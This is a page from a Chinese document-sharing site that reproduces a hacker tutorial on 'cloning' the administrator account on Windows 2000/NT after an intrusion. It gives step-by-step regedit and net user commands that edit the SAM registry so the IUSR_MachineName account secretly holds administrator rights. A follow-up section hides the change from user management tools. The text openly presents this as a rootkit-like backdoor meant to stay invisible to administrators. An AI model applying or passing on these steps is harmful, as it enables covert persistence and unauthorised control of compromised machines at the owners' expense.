克隆管理员帐号的方法

上传人:子 文档编号:42492094 上传时间:2018-06-02 格式:DOC 页数:5 大小:26KB
返回 下载 相关 举报
克隆管理员帐号的方法_第1页
第1页 / 共5页
克隆管理员帐号的方法_第2页
第2页 / 共5页
克隆管理员帐号的方法_第3页
第3页 / 共5页
克隆管理员帐号的方法_第4页
第4页 / 共5页
克隆管理员帐号的方法_第5页
第5页 / 共5页
亲,该文档总共5页,全部预览完了,如果喜欢就下载吧!
资源描述

《克隆管理员帐号的方法》由会员分享,可在线阅读,更多相关《克隆管理员帐号的方法(5页珍藏版)》请在金锄头文库上搜索。

1、克隆管理员帐号的方法克隆管理员帐号的方法克隆管理员帐号的方法经常看到一些人在入侵一台 Windows 2000 或者 Windows NT 后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share 一个类似于 RootKit 的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。 首先要让大家知道的概念是在 Windows 2000 和 Windows NT 里,默认管理员帐号的 SID 是固定的 500(0x1f4) ,那么我们可以用机器里已经存在的一个帐号将 SID 为 500 的帐号进行克隆,在这里我们选择

2、的帐号是 IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了) ,测试环境为 Windows 2000 Server。 运行一个 System 的 CMD Shell( http:/ 或使用 Http:/ CMD Shell 里面运行 regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers000001F4 这样我们将 SID 为 500 的管理员帐号的相关信息导出,然后编辑adam.reg 文件,将 adam.reg 文件的第三行-HKEY_LO

3、CAL_MACHINESAMSAMDomainsAccountUsers000001F4最后的1F4修改为 IUSR_MachineName 的 SID(大部分的机器该用户的 SID 都为 0x3E9,如果机器在最初安装的时候没有安装 IIS,而自己创建了帐号后再安装 IIS 就有可能不是这个值) ,将 Root.reg文件中的1F4修改为3E9后执行 regedit /s adam.reg 导入该 Reg 文件 然后运行 net user IUSR_MachineName Sometips 修改 IUSR_MachineName 的密码(最好使用 14 位的密码,越像IUSR_Machine

4、Name 的密码越好) OK,大功告成. 这样,我们拥有和默认管理员一样的桌面、一样的 Profile. 而且,当我们运行 net localgroup administrators 时,看看结果:C:net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members - Administrator The command completed successfully.

5、 再看看 USER2SID 的输出结果: C:user2sid Administrator S-1-5-21-1004336348-1078145449-854245398-500 Number of subauthorities is 5 Domain is IDONTKNOW Length of SID in memory is 28 bytes Type of SID is SidTypeUser C:user2sid iusr_machinename S-1-5-21-1004336348-1078145449-854245398-1001 Number of subauthoriti

6、es is 5 Domain is IDONTKNOW Length of SID in memory is 28 bytes Type of SID is SidTypeUser 我想,再高明的管理员也看不到任何的异状了.而且,随便管理员改成什么密码,我照样可以用 IUSR_MachineName,密码为 Sometips登陆.(没有哪位大侠级的管理员喜欢经常修改 IUSR_MachineName为其他的名字吧) _,这算不算 RootKit. 附: 1、感谢叮叮付出需要 reinstall OS 的代价. 2、任何用以上方法进行试验所导致的系统无法使用均与偶无关,偶均不提供技术支持. -叮

7、叮 的补充完善 很多人提到使用了管理工具的用户管理后,能够发现IUSR_MachineName 被提升了权限。 现给出解决办法。 方法同上,不过这次修改内容多一些。即 这次要导出两个 key 内容: 一个是 adam 提到的 regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers000001F4 然后另外一个是你需要修改那个账号的值 regedit /e iusr.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers000003E9 然后按照 adam 提到的修改 adam.reg

8、 “将 adam.reg 文件的第三行-HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers000001F4最后的1F4修改为 IUSR_MachineName 的 SID” 现在,你还要从 iusr.reg 文件中复制一下内容 就是将 iusr.reg 文件中“V=hex:0”开始一直到 iusr.reg 文件结束部分复制下来 然后替换掉 adam.reg 中同样位置的部分 最后使用 regedit /s adam.reg 导入该 Reg 文件 呵呵,别忘了给这个 IUSR_MachineName 改密码哦。 hehe,ok,大功告成。 现在 IUSR_MachineName 账号拥有了管理员的权限,但是你使用net.exe 和 管理工具中的用户管理都将看不到任何痕迹,即使你去察看所属于的组和用户。 都和修改前没有任何区别。 好了,补充结束。

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 生活休闲 > 科普知识

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号